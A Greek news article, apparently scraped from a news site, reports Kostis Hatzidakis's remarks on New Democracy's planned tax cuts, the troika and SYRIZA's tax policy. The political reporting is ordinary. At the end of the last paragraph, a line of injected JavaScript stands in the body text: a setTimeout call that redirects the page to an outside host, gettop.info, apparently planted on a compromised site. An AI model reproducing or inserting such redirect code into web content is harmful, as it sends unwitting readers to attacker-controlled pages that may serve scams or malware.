Χατζηδάκης: Δεν θα αρχίσουμε να μοιράζουμε σοκολατίτσες και καραμελίτσες…

0
3

 

«Για τις μειώσεις φορών 1,5 δισεκ. ευρώ της πρώτης φάσης ο κ. Μητσοτάκης δεν χρειάζεται να ρωτήσει την τρόικα» δήλωσε στον ΣΚΑΪ ο Κωστής Χατζηδάκης, ξεκαθαρίζοντας ότι αυτό δεν γίνεται επειδή στη ΝΔ είναι «μάγκες», αλλά επειδή υπάρχουν ισοδύναμα. Άλλωστε, πρόσθεσε, η ίδια η τρόικα είχε πει ότι ο κ Τσίπρας επέλεξε αυτή την επιλογή της αύξησης των φόρων ενώ υπάρχει και ο άλλος δρόμος της Ιρλανδίας και της Κύπρου.

«Για το δεύτερο σκέλος των μειώσεων φορών που συναρτώνται με την μείωση του πρωτογενούς πλεονάσματος προφανώς θα πρέπει να υπάρχει συνεννόηση» διευκρίνισε ο αντιπρόεδρος της ΝΔ. «Όλοι εμείς που φτάναμε αυτά το πακέτο τα κοστολογήσαμε όλα» διαβεβαίωσε.

Ο Κωστής Χατζηδάκης τόνισε ότι η λογική των δηλώσεων του προέδρου της ΝΔ στη ΔΕΘ θέτει στο επίκεντρο ακριβώς τον άνεργο και τον συνταξιούχο, καθώς με την ανάπτυξη έρχεται και βελτίωση εισοδημάτων.

«Αποτελεί υπονόμευση της προσπάθειας μας να υιοθετήσουμε αιτήματα που φαίνονται δίκαια αλλά είναι ανεκπλήρωτα… Δεν θα αρχίσουμε να μοιράζουμε σοκολατίτσες και καραμελίτσες… Δεν θέλουμε να γίνουμε ΣΥΡΙΖΑ νο2, κόμμα της δημαγωγίας».

«Ο Τσακαλώτος πήγε από το 13% στο 24% τον φόρο στα συσκευασμένα τρόφιμα και δείχνει ευαισθησία για τα εισιτήρια του θεάτρου» δήλωσε ακόμη ο κ. Χατζηδάκης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here